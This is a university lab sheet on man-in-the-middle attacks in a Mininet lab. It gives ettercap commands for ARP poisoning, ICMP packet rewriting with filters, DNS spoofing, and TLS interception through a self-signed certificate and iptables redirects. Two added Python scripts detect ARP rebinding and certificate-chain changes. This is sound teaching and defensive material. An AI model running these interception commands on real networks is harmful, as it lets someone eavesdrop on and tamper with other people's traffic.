Lab04. Man-in-the-middle attack

Important: read this to be graded!

Use the OpenStack CDCI template to start a new VM. To access the VM, log in to using your UPB credentials, and from there ssh into the private IP from OpenStack using “ubuntu” as the username and your ssh key.

Because we have to work remotely, please make sure that you record your screen while working. Here is how.

# start the recording after you ssh into the machine
ubuntu@cdci-v2:~/cdci/labs/lab03$ asciinema rec lab03_mihai.cast
# !!!IMPORTANT before you start working echo your name in the terminal!!!
ubuntu@cdci-v2:~/cdci/labs/lab03$ echo "Mihai Chiroiu's terminal!"
# ============ IMPORTANT ============
# do the tasks: enter docker
ubuntu@cdci-v2:~/cdci/labs/lab03$ ./ 
root@attacker:/# pwd
root@attacker:/# exit
# exited docker
# stop recording 
ubuntu@cdci-v2:~/cdci/labs/lab03$ exit
asciinema: recording finished
asciinema: press <enter> to upload to, <ctrl-c> to save locally

View the recording at:

# the IP of server has changed, sorry
ubuntu@cdci-v2:~/cdci/labs/lab03$ sudo echo "" > /etc/hosts
# upload the recording
ubuntu@cdci-v2:~/cdci/labs/lab03$ asciinema upload lab03_mihai.cast

When you finish your work, submit the details on the form . Double check to see if all is good (


  • MITM using ettercap tool
  • Wireshark usage for protocol dissection - DNS
  • Understanding attacks on ARP
  • Learning different types of MITM



01. [5p] Virtual machine setup

First, make sure that your virtual machine is updated (run the provided script, or create one).

Next, in one terminal start the provided Mininet topology.

root@cdci:/# cd cdci/lab04
root@cdci:/# /usr/bin/python3

If all is good, you should see the Mininet prompt “>”. If there are any problems starting the topology, use the given cleanup script and try to restart the topology.

02. [5p] Internet connectivity

Before you begin, make sure that you have Internet connectivity on both nodes (Attacker and Victim). R1 should be the gateway for the Attacker and the Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes.

root@ip-172-30-0-165:/# ./ 

root@ip-172-30-0-165:/# ./ 

03. [30p] ARP poisoning MITM attack

The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node, start an ARP poisoning MITM attack against the Victim machine using the ettercap tool. Use the “ping” tool from the Victim and make sure that all traffic (including traffic to the outside) goes through the Attacker’s node (use the extra verbose option for ettercap).

Make sure that you enable remote sniffing. To exit ettercap simply press Q.

Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions:

  • Can you spot the Gratuitous ARP packet sent when infecting the victim?
  • Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack.
  • Can you spot the Gratuitous ARP packet when the infection is stopped?

root@attacker:/# ettercap -E -T -M ARP:remote / /

ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team

Listening on:
attacker-eth0 -> FE:14:85:E7:5F:D0
* |==================================================>| 100.00 %

Sat Mar 14 20:39:26 2020 [835705]
D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 --> | P (0)

root@attacker:/# tcpdump -n -i attacker-eth0 -w mitm.pcap
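
Added example (not part of the original lab material): a pure-Python check that reads a classic pcap such as mitm.pcap and reports every time an IP address is claimed by a different MAC in ARP traffic, which is how both the poisoning and the re-ARP at shutdown show up in the capture. The attacker MAC comes from the ettercap output above and the other MAC in that output is assumed to be the victim's; the gateway MAC and all IP addresses are constructed placeholders.

```python
import struct

def arp_packets(pcap):
    """Yield (sender_mac, sender_ip) for every ARP frame in a classic Ethernet pcap."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(pcap[:4])
    if endian is None or struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("need a classic pcap with Ethernet link type")
    off = 24                                   # skip the 24-byte global header
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "I", pcap[off + 8:off + 12])[0]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 42 or frame[12:14] != b"\x08\x06":
            continue                           # EtherType is not ARP
        sha, spa = frame[22:28], frame[28:32]  # ARP sender MAC / sender IP
        yield sha.hex(":").upper(), ".".join(map(str, spa))

def find_rebindings(pcap):
    """Return (ip, old_mac, new_mac) each time an IP is claimed by a new MAC."""
    seen, alerts = {}, []
    for smac, sip in arp_packets(pcap):
        if seen.get(sip, smac) != smac:
            alerts.append((sip, seen[sip], smac))
        seen[sip] = smac
    return alerts

# --- constructed sample capture (gateway MAC and IPs are made up) ---
ATTACKER, VICTIM = "FE:14:85:E7:5F:D0", "D2:5D:2C:AD:D4:F5"  # MACs seen in the ettercap output
GATEWAY, GW_IP, VICTIM_IP = "02:00:00:00:00:01", "10.0.0.1", "10.0.0.2"

def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    smac, tmac = (bytes.fromhex(m.replace(":", "")) for m in (sender_mac, target_mac))
    sip, tip = (bytes(map(int, a.split("."))) for a in (sender_ip, target_ip))
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 2) + smac + sip + tmac + tip
    return tmac + smac + b"\x08\x06" + arp

def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out

# genuine gateway reply, poisoned reply (gateway IP with attacker MAC), re-ARP at shutdown
FRAMES = [arp_reply(m, GW_IP, VICTIM, VICTIM_IP) for m in (GATEWAY, ATTACKER, GATEWAY)]
SAMPLE = build_pcap(FRAMES)

if __name__ == "__main__":
    print(find_rebindings(SAMPLE))
```

To run it on the lab capture, pass the bytes of mitm.pcap to find_rebindings() instead of SAMPLE.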

04. [10p] Traffic dissection

Investigate the following traffic as it is generated by the Victim node:

  • HTTP and DNS while under MITM attack. Can you use Wireshark to rebuild/export the HTML pages that the victim opened (use wget or curl on the Victim to generate the traffic)?

Transfer the pcap file to your local computer and open it in Wireshark. Then select File→Export HTML Objects.

05. [20p] Raw packets altering

Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change the ICMP type from echo to reply (Hint:

  • You should observe the changes on the victim (no more replies).
  • Use tcpdump on the attacker to inspect the changes.

cat icmp.filter
if (ip.proto == ICMP) {
   msg("Changing ICMP type!\n");
   replace("", "");
}

etterfilter icmp.filter -o icmp.ef

cat icmp.filter
# ICMP type 0 is echo reply, type 8 is echo request
if (ip.proto == ICMP && icmp.type == 0) {
   msg("Changing address!\n");
   icmp.type = 8;
}

etterfilter icmp.filter -o icmp.ef
ettercap -T -F icmp.ef -M ARP:remote / /

06. [10p] DNS traffic altering

Another interesting Ettercap plugin is DNS spoofing. Configure it so that any queries for the “” domain name are translated into “”.

root@attacker:~# cat /etc/ettercap/etter.dns A 
root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote / /

Listening on:
attacker-eth0 -> 1E:D4:8A:37:43:CD
* |==================================================>| 100.00 %
Activating dns_spoof plugin...

Sat Mar 14 21:22:44 2020 [161164]
CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD
UDP --> |  (34) A [] spoofed to [] TTL [3600 s]

root@victim:/# nslookup
Non-authoritative answer:	canonical name =
root@victim:/# nslookup

07. [20p] HTTPS traffic inspection

Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe the changes in the certificate chain when the MITM attack is active.

  • First, use the “openssl s_client” tool (or other) to see the certificate path for the “” website.
    root@victim:~# openssl s_client -showcerts
    depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign
    verify return:1
    depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1
    verify return:1
    depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN =
    verify return:1
  • Next, run ettercap without TLS MITM (-S).
  • Now, run ettercap including TLS MITM.

For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: --certificate). Use the following code to create the private key and certificate.

root@attacker:~# openssl genrsa -out hacker.pem 2048
root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt 

For the TLS MITM attack, ettercap must be allowed to run as the root user and the iptables redirect commands must be enabled. This is required so that the ettercap SSL filter can receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, as follows.

ec_uid = 0
ec_gid = 0
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"

root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt / / 

root@victim:~# openssl s_client -showcerts
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify error:num=18:self signed certificate
verify return:1
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify return:1
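
Added example (not part of the original lab material): a small parser for the verify lines printed by “openssl s_client” that compares a baseline run with a later run and lists what changed in the certificate chain. Both sample inputs are the outputs shown in this section, copied as they appear on the page (the leaf CN is missing there and stays empty).

```python
import re

DEPTH = re.compile(r"^\s*depth=(\d+)\s+(.*\S)\s*$")
ERROR = re.compile(r"^\s*verify error:num=(\d+):(.*\S)\s*$")

def parse_verify(output):
    """Return ({depth: subject}, [(num, reason), ...]) from s_client verify lines."""
    chain, errors = {}, []
    for line in output.splitlines():
        if m := DEPTH.match(line):
            chain[int(m.group(1))] = m.group(2)
        elif m := ERROR.match(line):
            errors.append((int(m.group(1)), m.group(2)))
    return chain, errors

def org(subject):
    """Extract the O (organization) attribute from a one-line subject."""
    m = re.search(r"(?:^|,\s*)O = ([^,]+)", subject)
    return m.group(1).strip() if m else None

def compare(baseline, observed):
    """List the differences that indicate the chain was replaced in transit."""
    (b_chain, _), (o_chain, o_err) = parse_verify(baseline), parse_verify(observed)
    findings = []
    if len(o_chain) != len(b_chain):
        findings.append(f"chain length {len(b_chain)} -> {len(o_chain)}")
    b_org, o_org = org(b_chain.get(0, "")), org(o_chain.get(0, ""))
    if o_org != b_org:
        findings.append(f"leaf O changed: {b_org} -> {o_org}")
    findings += [f"verify error {n}: {why}" for n, why in o_err]
    return findings

# Verify lines copied from the two s_client runs shown in this section.
BASELINE = """\
depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign
verify return:1
depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1
verify return:1
depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN =
verify return:1
"""
UNDER_MITM = """\
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify error:num=18:self signed certificate
verify return:1
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify return:1
"""

if __name__ == "__main__":
    print("\n".join(compare(BASELINE, UNDER_MITM)))
```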

cdci/labs/4.txt · Last modified: 2020/05/15 17:07 by mihai.chiroiu